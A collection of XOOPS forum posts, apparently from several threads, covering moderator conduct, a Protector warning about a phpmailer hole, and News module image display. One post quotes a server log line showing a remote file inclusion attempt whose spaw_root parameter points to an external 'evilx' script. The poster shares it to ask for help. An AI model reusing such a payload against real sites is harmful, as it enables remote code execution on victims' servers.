I vouch for the fact that there was in fact a moderator team report, not as implied by the opening post of this thread that none was made. It was made on the moderator forums, which are not public forums, not on the open to the public space DJ provided.

I think phppp's intent is to get information to the community (public) where it is sorely needed.

Switched to SMTP mail...no problems with new user registration or sending mail and no complaints from Protector.

I wonder if my mail would work by simply switching to PHPmail()?

Broham, Thanks for the heads up on this latest version. I wish we could get GIJoe to post in here again.

After updating to 3.04, I received this message from Protector:

Quote:
phpmailer security hole! Change the preferences of mail from "sendmail" to another, or upgrade the core right now! (message by protector)

Anyone know what I should do about this?

As a community member I would always like to see (1) forum moderator in the who's online sidebar when I come in. I would also like to see the forum moderator have a user name that designated that was this persons job. Other than that I don't need to know his/her name/nick

I think this is a good idea. I believe it would help disassociate an individual's personality with his role as moderator in the eyes of the community. In this way, a moderator would appear as a bot and it's hard to argue with a bot. On a side note, I don't think anyone was insinuating a moderator as "hiding behind a username."

I'm a newbie, and the very first important XOOPSers I became familiar with were the moderators, even before knowing the names of the developers.

Moderators are seen as direct representatives of the XOOPS project and they should should operate with extreme tact because their actions can and will cause irreparable harm to the XOOPS project.

Those with the ability to shut a conversation off or close a thread need to have rules we all are aware of for closing or editing a conversation so WE DON'T get the idea there is personality clashes involved in the forum disciplining. Also we should not hear opinions from the Moderator that does not relate to the issue of Moderating at hand.

Thanks for the quick reply phppp. I also checked protector's logs but it didn't show anything on this.

Strange Server Log Entry

I found this entry in my server log.

Quote:
207.136.183.50 - - [12/Jun/2007:23:25:44 -0400] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?
spaw_root=http://www.freewebtown.com/sclipici/evilx?? HTTP/1.1" 404 - "-" "libwww-perl/5.803"[

I typed the freewebtown url in a browser and got a page full of source text that I don't understand. It does look evil though.

I removed the spaw editor for the tiny content module awhile back, so I'm not sure what is going on here. I'm hoping maybe one of you guys will know. Thanks in advance for any help.

What version of News are you using? I use News 1.53 by the great Herve and my text surrounds the image just as the second graphic in your post does.

However, I don't insert the image but rather choose to display it using "Display Topic Image?"
